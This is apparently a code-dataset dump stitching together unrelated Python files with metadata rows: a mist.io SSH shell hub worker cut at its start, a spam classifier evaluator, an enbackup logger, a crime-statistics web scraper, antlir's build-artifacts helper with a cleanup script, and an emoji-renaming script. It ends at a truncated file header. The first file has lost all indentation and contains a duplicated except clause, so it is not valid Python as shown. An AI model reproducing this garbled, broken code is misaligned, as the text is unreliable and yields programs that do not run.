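# {"owner_id": "...", "cloud_id": "...", "machine_id": "...", "host": "10.0.0.5",
#  "columns": 80, "rows": 24, "provider": "", "job_id": ""}
# host, cloud_id and machine_id may be omitted only when job_id is set
# (the temporary Orchestration-shell exception above).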
def on_ready(self, body='', msg=''):
super(ShellHubWorker, self).on_ready(body, msg)
self.connect()
def connect(self):
"""Connect to shell"""
if self.shell is not None:
log.error("%s: Can't call on_connect twice.", self.lbl)
return
data = self.params
self.provider = data.get('provider', '')
host = data.get('host', '')
cloud_id = data.get('cloud_id', '')
machine_id = data.get('machine_id', '')
job_id = data.get('job_id', '')
cols = data["columns"]
rows = data["rows"]
try:
self.shell = mist.api.shell.Shell(host, provider=self.provider)
key_id, ssh_user = self.shell.autoconfigure(owner=self.owner,
cloud_id=cloud_id,
machine_id=machine_id,
job_id=job_id,
cols=cols,
rows=rows)
self.params.update(key_id=key_id, ssh_user=ssh_user)
except Exception as exc:
if self.provider == 'docker':
self.shell = mist.api.shell.Shell(data['host'],
provider='docker')
key_id, ssh_user = self.shell.autoconfigure(
self.owner, data['cloud_id'], data['machine_id'],
job_id=data['job_id'],
)
elif self.provider == "kubevirt":
self.shell = mist.api.shell.Shell(data['host'],
provider='kubevirt')
key_id, ssh_user = self.shell.autoconfigure(
self.owner, data['cloud_id'], data['machine_id']
)
else:
self.shell = mist.api.shell.Shell(data['host'])
key_id, ssh_user = self.shell.autoconfigure(
self.owner, data['cloud_id'], data['machine_id']
)
except Exception as exc:
log.warning("%s: Couldn't connect with SSH, error %r.",
self.lbl, exc)
if isinstance(exc, mist.api.exceptions.MachineUnauthorizedError):
err = 'Permission denied (publickey).'
else:
err = str(exc)
self.emit_shell_data(err)
self.params['error'] = err
self.stop()
return
self.channel = self.shell.invoke_shell('xterm',
data['columns'], data['rows'])
self.greenlets['read_stdout'] = gevent.spawn(self.get_ssh_data)
def on_data(self, body, msg):
"""Received data that must be forwarded to shell's stdin"""
if self.provider == 'kubevirt':
self.shell.send(body)
# TODO: Factory should be moved from here
elif self.shell.get_type() == "ParamikoShell" or \
self.shell.get_type() == "DockerShell":
self.channel.send(body.encode('utf-8', 'ignore'))
elif self.shell.get_type() == "LXDShell":
self.channel.send(bytearray(body, encoding='utf-8'), opcode=2)
def on_resize(self, body, msg):
"""Received resize shell window command"""
if isinstance(body, dict):
if 'columns' in body and 'rows' in body:
columns, rows = body['columns'], body['rows']
log.info("%s: Resizing shell to (%s, %s).",
self.lbl, columns, rows)
try:
if self.provider == 'kubevirt':
self.shell._shell.resize(columns, rows)
elif self.shell.get_type() == "LXDShell":
# also pass the channel to emulate how things
# were done in the past
columns, rows = self.shell.resize(columns=columns,
rows=rows)
else:
self.channel.resize_pty(columns, rows)
return columns, rows
except Exception as exc:
log.warning("%s: Error resizing shell to (%s, %s): %r.",
self.lbl, columns, rows, exc)
def emit_shell_data(self, data):
self.send_to_client('data', data)
def get_ssh_data(self):
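        # Pump data from the remote shell back to the client: block until the SSH
        # channel is readable, then forward whatever arrived until the channel closes.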
try:
if self.provider == 'docker':
try:
self.channel.send('\n')
except:
pass
while True:
gevent.socket.wait_read(self.channel.fileno())
try:
data = self.channel.recv(1024).decode('utf-8', 'ignore')
except TypeError:
data = self.channel.recv().decode('utf-8', 'ignore')
if not len(data):
return
self.emit_shell_data(data)
finally:
self.channel.close()
def stop(self):
super(ShellHubWorker, self).stop()
if self.channel is not None:
self.channel.close()
self.channel = None
if self.shell is not None:
self.shell.disconnect()
self.shell = None
class LoggingShellHubWorker(ShellHubWorker):
def __init__(self, *args, **kwargs):
super(LoggingShellHubWorker, self).__init__(*args, **kwargs)
self.capture = []
self.capture_started_at = 0
self.stopped = False
def on_ready(self, body='', msg=''):
super(LoggingShellHubWorker, self).on_ready(body, msg)
# Don't log cfy container log views
if (
self.params.get('provider') != 'docker' or
not self.params.get('job_id')
):
mist.api.logs.methods.log_event(action='open', event_type='shell',
shell_id=self.uuid, **self.params)
def emit_shell_data(self, data):
self.capture.append((time.time(), 'data', data))
super(LoggingShellHubWorker, self).emit_shell_data(data)
def on_resize(self, body, msg):
res = super(LoggingShellHubWorker, self).on_resize(body, msg)
if res:
self.capture.append((time.time(), 'resize', res))
def stop(self):
if self.shell and not self.stopped:
            # if not self.shell, the namespace was initialized
            # but shell_open never actually happened
if config.ENABLE_SHELL_CAPTURE:
if self.capture:
# save captured data
capture = ShellCapture()
capture.owner = mist.api.users.models.Owner(
id=self.params['owner_id']
)
capture.capture_id = self.uuid
capture.cloud_id = self.params['cloud_id']
capture.machine_id = self.params['machine_id']
capture.key_id = self.params.get('key_id')
capture.host = self.params['host']
capture.ssh_user = self.params.get('ssh_user')
capture.started_at = self.capture_started_at
capture.finished_at = time.time()
capture.columns = self.params['columns']
capture.rows = self.params['rows']
capture.capture = [(tstamp - self.capture[0][0],
event, data)
for tstamp, event, data in self.capture]
capture.save()
# Don't log cfy container log views
if (
self.params.get('provider') != 'docker' or
not self.params.get('job_id')
):
mist.api.logs.methods.log_event(action='close',
event_type='shell',
shell_id=self.uuid,
**self.params)
super(LoggingShellHubWorker, self).stop()
class ShellHubClient(mist.api.hub.main.HubClient):
def __init__(self, *args, **kwargs):
super(ShellHubClient, self).__init__(*args, worker_type='shell',
**kwargs)
def start(self):
"""Call super and also start stdin reader greenlet"""
super(ShellHubClient, self).start()
gevent.sleep(1)
self.greenlets['stdin'] = gevent.spawn(self.send_stdin)
def send_stdin(self):
"""Continuously read lines from stdin and send them to worker"""
while True:
gevent.socket.wait_read(sys.stdin.fileno())
self.send_data(sys.stdin.readline())
gevent.sleep(0)
def send_data(self, data):
self.send_to_worker('data', data)
def resize(self, columns, rows):
        self.send_to_worker('resize', {'columns': columns, 'rows': rows})
def on_data(self, body, msg):
print(body)
def stop(self):
self.send_close()
super(ShellHubClient, self).stop()
if __name__ == "__main__":
mist.api.hub.main.main(workers={'shell': LoggingShellHubWorker})
| 38.742754 | 79 | 0.506219 | 1,131 | 10,693 | 4.655172 | 0.186561 | 0.039316 | 0.019753 | 0.011396 | 0.317569 | 0.25622 | 0.174169 | 0.135423 | 0.128965 | 0.098196 | 0 | 0.002116 | 0.381277 | 10,693 | 275 | 80 | 38.883636 | 0.793682 | 0.055363 | 0 | 0.288991 | 0 | 0 | 0.076296 | 0 | 0 | 0 | 0 | 0.003636 | 0 | 1 | 0.091743 | false | 0.004587 | 0.055046 | 0 | 0.178899 | 0.004587 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
91fb2b70fbc9290230d966266f41cc0cdba01ff0 | 2,317 | py | Python | 02 SRC/nbevaluate.py | addyg/Filter-Spam-NLP | 107412f4d76e239bb3b7762af239813f6b8ec55c | [
"Apache-2.0"
] | null | null | null | 02 SRC/nbevaluate.py | addyg/Filter-Spam-NLP | 107412f4d76e239bb3b7762af239813f6b8ec55c | [
"Apache-2.0"
] | null | null | null | 02 SRC/nbevaluate.py | addyg/Filter-Spam-NLP | 107412f4d76e239bb3b7762af239813f6b8ec55c | [
"Apache-2.0"
] | null | null | null |
class eval:
def __init__(self):
self.metric = {}
for label in 'spam', 'ham':
# true positive, true negative, false negative, false positive
for condition in 'tp', 'tn', 'fn', 'fp':
self.metric[label + '_' + condition] = 0.0
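    # Update the per-label confusion counts for one (actual, predicted) pair;
    # a spam true positive is simultaneously a ham true negative, and so on.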
def confusion_mat(self, act, pred):
if act == 'spam' and pred == 'spam':
self.metric['spam' + '_' + 'tp'] += 1
self.metric['ham' + '_' + 'tn'] += 1
elif act == 'spam' and pred == 'ham':
self.metric['spam' + '_' + 'fn'] += 1
self.metric['ham' + '_' + 'fp'] += 1
elif act == 'ham' and pred == 'spam':
self.metric['spam' + '_' + 'fp'] += 1
self.metric['ham' + '_' + 'fn'] += 1
else:
self.metric['spam' + '_' + 'tn'] += 1
self.metric['ham' + '_' + 'tp'] += 1
def calculate(self):
# Read predicted label, and ground truth label
with open("nboutput.txt", "r", encoding="latin1") as f:
lines = f.readlines()
for line in lines:
label, path = line.split('\t')
if label in path:
self.confusion_mat(label, label)
else:
if label == 'ham':
self.confusion_mat('spam', label)
else:
self.confusion_mat('ham', label)
# print(self.metric)
# Output Precision, Recall, and F1 Score
for label in 'spam', 'ham':
# precision = tp/(tp + fp)
# recall = tp/(tp + fn)
recall, precision, f1_score = 0, 0, 0
if self.metric[label + '_' + 'tp'] != 0:
recall = self.metric[label + '_' + 'tp']/(self.metric[label + '_' + 'tp'] + self.metric[label + '_' + 'fn'])
                precision = self.metric[label + '_' + 'tp']/(self.metric[label + '_' + 'tp'] + self.metric[label + '_' + 'fp'])
f1_score = 2 * (precision * recall) / (precision + recall)
print(label + ' precision' + ' =', round(precision, 2))
print(label + ' recall' + ' =', round(recall, 2))
print(label + ' F1 score' + ' =', round(f1_score, 2))
if __name__ == '__main__':
obj = eval()
obj.calculate()
| 32.633803 | 126 | 0.457057 | 248 | 2,317 | 4.129032 | 0.245968 | 0.175781 | 0.117188 | 0.083008 | 0.177734 | 0.144531 | 0.095703 | 0.095703 | 0.095703 | 0.095703 | 0 | 0.016495 | 0.372033 | 2,317 | 70 | 127 | 33.1 | 0.687285 | 0.090634 | 0 | 0.116279 | 0 | 0 | 0.090086 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.069767 | false | 0 | 0 | 0 | 0.093023 | 0.069767 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
91fb79c8deb31d7284ff35c642ba478b5e97080e | 5,321 | py | Python | src/enbackup/log.py | ensoft/enbackup | 56d1ed48692269ecfa5799656f90f70663645e5f | [
"MIT"
] | null | null | null | src/enbackup/log.py | ensoft/enbackup | 56d1ed48692269ecfa5799656f90f70663645e5f | [
"MIT"
] | null | null | null | src/enbackup/log.py | ensoft/enbackup | 56d1ed48692269ecfa5799656f90f70663645e5f | [
"MIT"
] | null | null | null | ###############################################################################
# log.py - enbackup logging support
#
# September 2012, Jim M
#
# Copyright (c) 2012 by Ensoft Ltd. All right reserved
#
# Version 1.0 - Initial version
###############################################################################
#
# This module provides a Logger class which provides several levels of logging,
# in increasing order of importance:
# - Debug
# - Log
# - Error
#
# A user of the module creates a logger, optionally specifying a log file
# and a debug file. If no debug file is specified then a default is
# used; if no log file is specified then messages are only printed to the
# debug file.
#
# The behavior is then:
# - Debug: prints messages to the debug file only.
# - Log: prints messages to the debug file and log file (if specified)
# - Error: prints messages to the debug file, log file, and stderr.
#
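# A minimal usage sketch (the log file name below is just an example):
#
#   logger = Logger("restore", logfile="enbackup-restore.log")
#   logger.debug("scanning devices")   # debug file only
#   logger.log("restore started")      # debug file + log file
#   logger.error("mount failed")       # debug file, log file, and stderr
#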
import os
import sys
import logging
import tempfile
from enbackup.utils import run_cmd_output, FileLock, chown_enbackup
default_format = \
"%(asctime)s %(levelname)-6s %(process)6d [%(name)-8s]: %(message)s"
default_log_dir = "/var/log/enbackup/"
default_debugfile = "enbackup.debug"
logging_lockfile = "enbackup.log.lock"
class EnbackupFileHandler(logging.FileHandler):
def _open(self):
#
# Call the standard handler, and then change the file ownership
# to enbackup:
#
retval = logging.FileHandler._open(self)
chown_enbackup(self.baseFilename)
return retval
class Logger(object):
logfile = None
debugfile = None
def __init__(self, name, logfile=None, debugfile=None):
#
# We support logging messages to up to two different files;
# one for log messages, and one for debug. We add filters
# to the handlers to ensure only messages of the desired
# verbosity get sent to each target.
#
self.logger = logging.getLogger(name)
self.logger.setLevel(logging.DEBUG)
self.formatter = logging.Formatter(default_format)
if not os.path.exists(default_log_dir):
os.makedirs(default_log_dir)
chown_enbackup(default_log_dir)
#
# Log messages go to the specified log file, if any
#
if logfile != None:
self.logfile = default_log_dir + logfile
self.handler = EnbackupFileHandler(self.logfile)
self.handler.setFormatter(self.formatter)
self.handler.setLevel(logging.INFO)
self.logger.addHandler(self.handler)
#
# Debug and Log messages go to the specified debugfile,
# or the default enbackup debugfile if none was provided.
#
if debugfile == None:
debugfile = default_debugfile
self.debugfile = default_log_dir + debugfile
self.debughandler = EnbackupFileHandler(self.debugfile)
self.debughandler.setFormatter(self.formatter)
self.debughandler.setLevel(logging.DEBUG)
self.logger.addHandler(self.debughandler)
#
# Add a handler for printing error messages to stderr.
# Note these will also get recorded in the debug and log
# files.
#
handler = logging.StreamHandler(sys.stderr)
handler.setLevel(logging.ERROR)
handler.setFormatter(logging.Formatter("%(message)s"))
self.logger.addHandler(handler)
#
# Grab a lock while actually emitting a log message, since the
# logging infra is not multi-process-safe.
#
def log(self, msg):
"""
Log a message.
The message will get recorded in the log file and the debug file
"""
with FileLock("Logging from PID {0}".format(os.getpid()),
logging_lockfile):
self.logger.info(msg)
def debug(self, msg):
"""
Print a debug message
The message will get recorded in the debug file
"""
with FileLock("Debug from PID {0}".format(os.getpid()),
logging_lockfile):
self.logger.debug(msg)
def error(self, msg):
"""
Print an error message
The message will get recorded in the debug file and the log file,
and printed to stderr.
"""
with FileLock("Error from PID {0}".format(os.getpid()),
logging_lockfile):
self.logger.error(msg)
def send_email(self, subject, body, to_address):
"""
        Send an email with the supplied body to the specified address, logging
any errors that are hit.
"""
with tempfile.NamedTemporaryFile() as tmpfile:
tmpfile.write(body)
tmpfile.seek(0)
mail_cmd = ["mail",
"-s", "enbackup: " + subject,
to_address]
(rc, output, err) = run_cmd_output(mail_cmd,
self,
cmd_stdin=tmpfile.fileno())
if rc != 0:
self.error("Failed to send email to {0}, return code {1}:\n"
"{1}\n{2}".format(to_address, rc, output, err))
| 32.845679 | 79 | 0.583349 | 617 | 5,321 | 4.965964 | 0.290113 | 0.026436 | 0.027415 | 0.018277 | 0.164817 | 0.133159 | 0.08812 | 0.08812 | 0.076044 | 0.076044 | 0 | 0.005951 | 0.305206 | 5,321 | 161 | 80 | 33.049689 | 0.822829 | 0.323435 | 0 | 0.044776 | 0 | 0.014925 | 0.077631 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.089552 | false | 0 | 0.074627 | 0 | 0.238806 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
91fb976cf89d57e63861aa6fb361d456458b71f9 | 4,699 | py | Python | crimegrade_scraper.py | DariHernandez/crimegrade-scraper | ffc08b7a14d414c97013b64b4ca549b9dfd4045f | [
"MIT"
] | null | null | null | crimegrade_scraper.py | DariHernandez/crimegrade-scraper | ffc08b7a14d414c97013b64b4ca549b9dfd4045f | [
"MIT"
] | null | null | null | crimegrade_scraper.py | DariHernandez/crimegrade-scraper | ffc08b7a14d414c97013b64b4ca549b9dfd4045f | [
"MIT"
] | null | null | null | import os
import time
import log
import config
import globals
import requests
from database.postgresql import PostgreSQL
from scraping_manager.automate import Web_scraping
def scraper ():
"""
Main function of the scraper.
Extract data and save it in database
"""
    # First instance of the database class
server = config.get_credential("db_server")
database = config.get_credential("db_name")
user = config.get_credential("db_user")
password = config.get_credential("db_password")
globals.db_manager = PostgreSQL(server,
database,
user,
password)
# Create table
output_table = str(config.get_credential ("output_table")).lower()
tables = globals.db_manager.get_tables_names()
if (output_table,) in tables:
globals.db_manager.truncate_table(output_table)
log.info(f"Table {output_table} truncated", print_text=True)
else:
columns = [
["Assault", "numeric"],
["Robbery", "numeric"],
["Rape", "numeric"],
["Murder", "numeric"],
["Total_Violent_Crime", "varchar"],
["Theft", "numeric"],
["Vehicle_Theft", "numeric"],
["Burglary", "numeric"],
["Arson", "numeric"],
["Total_Property_Crime", "varchar"],
["Kidnapping", "numeric"],
["Drug_Crimes", "numeric"],
["Vandalism", "numeric"],
["Identity_Theft", "numeric"],
["Animal_Cruelty", "numeric"],
["Total_Other_Rate", "varchar"],
["zipcode", "integer"]
]
globals.db_manager.create_table(f"{output_table}", columns)
log.info(f"Table {output_table} created", print_text=True)
# Get zip codes
zipcodes = []
zipcodes_path = os.path.join(os.path.dirname(__file__), "zipcodes.txt")
with open (zipcodes_path, "r") as file:
zipcodes = file.readlines()
# Loop for each zip code in list
valid_rows = 0
zipcodes_num = len(zipcodes)
for zipcode in zipcodes:
# End program if global status is not running
if not globals.loading:
break
# Instance of selenium and load page
zipcode_formated = zipcode.replace("\n", "")
page = f"https://crimegrade.org/safest-places-in-{zipcode_formated}/"
scraper = Web_scraping(page, headless=True, user_agent=True)
# Logs and status
index = zipcodes.index(zipcode) + 1
log.update_status(f'Scraping zipcode {zipcode_formated} ({index} / {zipcodes_num})')
# Skip no found pages
h1 = scraper.get_text("h1")
if h1 == "No Results Found":
continue
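        # CSS selectors for the three summary tables on the page; judging by the
        # column names created above, these appear to correspond to the violent,
        # property, and "other" crime tables.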
tables_selectors = [
"p + .one_third",
".one_third + .one_third",
".one_third.et_column_last"
]
columns = []
values = []
for table_selector in tables_selectors:
# Get data for each table
selector_row_vcr = f"{table_selector} > .SummaryStats.mtr-table.mtr-tr-th tr"
rows_vcr = scraper.get_elems(selector_row_vcr)
            # Loop over each row in the table
for index_row in range(0, len(rows_vcr)+1):
title_selector = selector_row_vcr + f":nth-child({index_row}) > *:nth-child(1)"
value_selector = selector_row_vcr + f":nth-child({index_row}) > *:nth-child(2)"
title = str(scraper.get_text(title_selector)).strip().replace('"', "")
value = str(scraper.get_text(value_selector)).strip().replace('"', "")
# Clean data
                skip_titles = [None, "Crime Type", "None"]
                if title and value and title not in skip_titles:
title_formated = str(title).lower().replace(" ", "_")
title_formated = title_formated.replace('”', "").replace('“', "")
columns.append(title_formated)
values.append(value)
# Send data to database
globals.db_manager.insert_rows (output_table, columns, [values], nstring=False)
valid_rows += 1
# End browser
scraper.end_browser()
# End loading
globals.loading = False
globals.status += f"\nRows in database: {valid_rows}"
if __name__ == "__main__":
globals.loading = True
scraper() | 35.067164 | 95 | 0.546286 | 489 | 4,699 | 5.034765 | 0.355828 | 0.035743 | 0.038587 | 0.034119 | 0.070674 | 0.070674 | 0.03818 | 0.03818 | 0.03818 | 0.03818 | 0 | 0.003218 | 0.338583 | 4,699 | 134 | 96 | 35.067164 | 0.788932 | 0.08172 | 0 | 0 | 0 | 0 | 0.192155 | 0.024282 | 0 | 0 | 0 | 0 | 0 | 1 | 0.011111 | false | 0.022222 | 0.088889 | 0 | 0.1 | 0.022222 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
91fbba13b6f826be2a093d678ee6c8d013aecc80 | 7,389 | py | Python | antlir/artifacts_dir.py | lhl2617/antlir | 1041732e8163c1316d3e45c0ba4db7937faa4809 | [
"MIT"
] | null | null | null | antlir/artifacts_dir.py | lhl2617/antlir | 1041732e8163c1316d3e45c0ba4db7937faa4809 | [
"MIT"
] | null | null | null | antlir/artifacts_dir.py | lhl2617/antlir | 1041732e8163c1316d3e45c0ba4db7937faa4809 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"DANGER: The resulting PAR will not work if copied outside of buck-out."
import os
import shutil
import stat
import subprocess
import sys
import textwrap
from typing import Optional
from .fs_utils import Path, populate_temp_file_and_rename
def _maybe_make_symlink_to_scratch(
symlink_path: Path,
target_in_scratch: Path,
target_in_repo: Path,
) -> Path:
"""
IMPORTANT: This must be safe against races with other concurrent copies
of `artifacts_dir.py`.
"""
scratch_bin = shutil.which("mkscratch")
if scratch_bin is None:
return symlink_path
target_path = Path(
subprocess.check_output(
[scratch_bin, "path", "--subdir", target_in_scratch, target_in_repo]
).rstrip()
)
# Atomically ensure the desired symlink exists.
try:
os.symlink(target_path, symlink_path)
except FileExistsError:
pass
# These two error conditions should never happen under normal usage, so
# they are left as exceptions instead of auto-remediations.
if not os.path.islink(symlink_path):
raise RuntimeError(
f"{symlink_path} is not a symlink. Clean up whatever is there "
"and try again?"
)
real_target = symlink_path.realpath()
if real_target != target_path:
raise RuntimeError(
f"{symlink_path} points at {real_target}, but should point "
f"at {target_path}. Clean this up, and try again?"
)
return target_path
def _first_parent_containing_sigil(
start_path: Path, sigil_name: str, is_dir: bool
) -> Optional[Path]:
root_path = start_path.abspath()
while True:
if root_path.realpath() == Path("/"): # No infinite loop on //
return None
maybe_sigil_path = root_path / sigil_name
if maybe_sigil_path.exists() and (
os.path.isdir(maybe_sigil_path)
if is_dir
else os.path.isfile(maybe_sigil_path)
):
return root_path
root_path = root_path.dirname()
def find_repo_root(path_in_repo: Optional[Path] = None) -> Path:
"""
Find the path of the VCS repository root. This could be the same thing
as `find_buck_cell_root` but importantly, it might not be. Buck has the
concept of cells, of which many can be contained within a single VCS
repository. When you need to know the actual root of the VCS repo, use
this method.
"""
# We have to start somewhere reasonable. If we don't get an explicit path
# start from the cwd and then the location of the binary being executed.
paths_to_try = (
[path_in_repo]
if path_in_repo
else [Path(os.getcwd()), Path(sys.argv[0]).dirname()]
)
for path_in_repo in paths_to_try:
repo_root = _first_parent_containing_sigil(
path_in_repo, ".hg", is_dir=True
) or _first_parent_containing_sigil(path_in_repo, ".git", is_dir=True)
if repo_root:
return repo_root
# If we got this far we never found the repo root
raise RuntimeError(
f"No hg or git root found in any ancestor of {paths_to_try}."
f" Is this an hg or git repo?"
)
def find_buck_cell_root(path_in_repo: Optional[Path] = None) -> Path:
"""
If the caller does not provide a path known to be in the repo, a reasonable
default of sys.argv[0] will be used. This is reasonable as binaries/tests
calling this library are also very likely to be in repo.
This is intended to work:
- under Buck's internal macro interpreter, and
- using the system python from `facebookincubator/antlir`.
This is functionally equivalent to `buck root`, but we opt to do it here as
`buck root` takes >2s to execute (due to CLI startup time).
"""
paths_to_try = (
[Path(path_in_repo)]
if path_in_repo
else [Path(os.getcwd()), Path(sys.argv[0])]
)
for path_in_repo in paths_to_try:
cell_path = _first_parent_containing_sigil(
path_in_repo, ".buckconfig", is_dir=False
)
if cell_path:
# Future: this should just use Path, but we have to finish
# converting all the downstream uses of this first
return cell_path
# If we got this far we never found the cell root
raise RuntimeError(
f"Could not find .buckconfig in any ancestor of {paths_to_try}"
)
def find_artifacts_dir(path_in_repo: Optional[Path] = None) -> Path:
"See `find_buck_cell_root`'s docblock to understand `path_in_repo`"
return find_buck_cell_root(path_in_repo=path_in_repo) / "buck-image-out"
def ensure_per_repo_artifacts_dir_exists(
path_in_repo: Optional[str] = None,
) -> Path:
"See `find_buck_cell_root`'s docblock to understand `path_in_repo`"
buck_cell_root = find_buck_cell_root(path_in_repo=path_in_repo)
artifacts_dir = find_artifacts_dir(path_in_repo=path_in_repo)
# On Facebook infra, the repo might be hosted on an Eden filesystem,
# which is not intended as a backing store for a large sparse loop
# device filesystem. So, we will put our artifacts in a blessed scratch
# space instead.
#
# The location in the scratch directory is a hardcoded path because
# this really must be a per-repo singleton.
real_dir = _maybe_make_symlink_to_scratch(
artifacts_dir, "buck-image-out", buck_cell_root
)
try:
os.mkdir(real_dir)
except FileExistsError:
pass # May race with another mkdir from a concurrent artifacts_dir.py
ensure_clean_sh_exists(artifacts_dir)
return artifacts_dir
def ensure_clean_sh_exists(artifacts_dir: Path) -> None:
clean_sh_path = artifacts_dir / "clean.sh"
with populate_temp_file_and_rename(
clean_sh_path, overwrite=True, mode="w"
) as f:
# We do not want to remove image_build.log because the potential
# debugging value far exceeds the disk waste
f.write(
textwrap.dedent(
"""\
#!/bin/bash
set -ue -o pipefail
buck clean
sudo umount -l buck-image-out/volume || true
rm -f buck-image-out/image.btrfs
# Just try to remove empty checkout dirs if they exist
# Leave any checkouts as they may still be mounted by Eden
REPOS="buck-image-out/eden/repos"
mkdir -p "$REPOS"
# Remove leftover lock files
find "$REPOS" -maxdepth 2 -depth -type f -print0 -path ".lock_*" | xargs -0 rm 2>/dev/null || true
# Remove empty checkout dirs
find "$REPOS" -maxdepth 2 -depth -type d -print0 | xargs -0 rmdir 2>/dev/null || true
if [ -d "$REPOS" ]; then
echo "Eden checkouts remain in $REPOS and were not cleaned up"
else
rm -rf buck-image-out/eden
fi
""" # noqa: E501
)
)
os.chmod(
clean_sh_path,
os.stat(clean_sh_path).st_mode
| (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH),
)
if __name__ == "__main__":
print(ensure_per_repo_artifacts_dir_exists())
| 34.208333 | 110 | 0.653674 | 1,068 | 7,389 | 4.315543 | 0.310861 | 0.031243 | 0.045563 | 0.020829 | 0.228249 | 0.206552 | 0.14233 | 0.100673 | 0.075071 | 0.062486 | 0 | 0.002968 | 0.270402 | 7,389 | 215 | 111 | 34.367442 | 0.851976 | 0.313304 | 0 | 0.169492 | 0 | 0 | 0.142556 | 0.010785 | 0 | 0 | 0 | 0 | 0 | 1 | 0.059322 | false | 0.016949 | 0.067797 | 0 | 0.194915 | 0.008475 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
91fc7245178fc7e36b3d38eef13ccba6bb0bb7fc | 1,828 | py | Python | rename_emoji_with_shortcode.py | riseupgirls/noto-emoji | 77395c9c9f9eaed74e1f3e72ab51a5f99c95c39b | [
"Apache-2.0"
] | null | null | null | rename_emoji_with_shortcode.py | riseupgirls/noto-emoji | 77395c9c9f9eaed74e1f3e72ab51a5f99c95c39b | [
"Apache-2.0"
] | null | null | null | rename_emoji_with_shortcode.py | riseupgirls/noto-emoji | 77395c9c9f9eaed74e1f3e72ab51a5f99c95c39b | [
"Apache-2.0"
] | null | null | null | import os
import pathlib
import re
import shutil
import unidecode
from nototools import unicode_data
em_version = re.compile(r"^(\(emoji\) *)?E\d+(\.\d+)?")
new_to_old = {}
# this function is copied in generate_emoji_html
def shortcode(u_seq):
n = unicode_data.get_emoji_sequence_name(u_seq)
old = n
n = unidecode.unidecode(n)
n = re.sub(em_version, "", n)
n = n.replace("(emoji)", "")
n = n.lower().strip()
n = n.replace("*", "star")
n = n.replace(r"\x{23}", "number_sign")
n = n.replace("'", "")
n = n.replace('"', "")
n = n.replace(".", "_")
n = n.replace("(", "")
n = n.replace(")", "_")
n = n.replace(": ", "_")
n = n.replace(" & ", "_")
n = n.replace(" - ", "_")
n = n.replace("-", "_")
n = n.replace(", ", "_")
n = n.replace(" ", "_")
n = n.replace("__", "_")
if n in new_to_old:
raise Exception(
"We already have a file named: {}, it points on: {}".format(
n, new_to_old[n]
)
)
new_to_old[n] = old
return n
source = pathlib.Path("./build/compressed_pngs/").absolute()
destination = pathlib.Path("./build/release/emoji").absolute()
rename = set()
for f in source.iterdir():
if f.suffix != ".png":
continue
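    # Parse the code points out of the file name; the build output names are assumed
    # to look like "emoji_u1f600_1f3fb.png" (a prefix, then "u"-prefixed hex code points).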
n = f.stem
n = n.split("_")[1:]
n[0] = n[0][1:]
n = tuple([int(i, base=16) for i in n])
n = shortcode(n)
rename.add((f.absolute(), pathlib.Path(n)))
destination.mkdir(parents=True, exist_ok=True)
os.chdir(destination)
for source, dest_name in rename:
dest_name = "{{" + source.stem + "}}{{" + dest_name.name + "}}"
dest = destination / dest_name
dest = dest.with_suffix(".png")
print(source, " ->", destination / dest)
shutil.copy(source, destination / dest)
# os.symlink(source.name, dest.name)
| 25.746479 | 72 | 0.556346 | 251 | 1,828 | 3.896414 | 0.378486 | 0.042945 | 0.138037 | 0.112474 | 0.129857 | 0.110429 | 0.110429 | 0.110429 | 0.110429 | 0.110429 | 0 | 0.00576 | 0.240153 | 1,828 | 70 | 73 | 26.114286 | 0.698344 | 0.044311 | 0 | 0.035088 | 0 | 0 | 0.114106 | 0.025803 | 0 | 0 | 0 | 0 | 0 | 1 | 0.017544 | false | 0 | 0.105263 | 0 | 0.140351 | 0.017544 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
91fcee412493446a4ec498785af8d4f2dc9ddc76 | 20,027 | py | Python | egs/yoloxochitl_mixtec/asr1/local/data_prep.py | texpomru13/espnet | 7ef005e832e2fb033f356c16f54e0f08762fb4b0 | [
"Apache-2.0"
] | 5,053 | 2017-12-13T06:21:41.000Z | 2022-03-31T13:38:29.000Z | egs/yoloxochitl_mixtec/asr1/local/data_prep.py | texpomru13/espnet | 7ef005e832e2fb033f356c16f54e0f08762fb4b0 | [
"Apache-2.0"
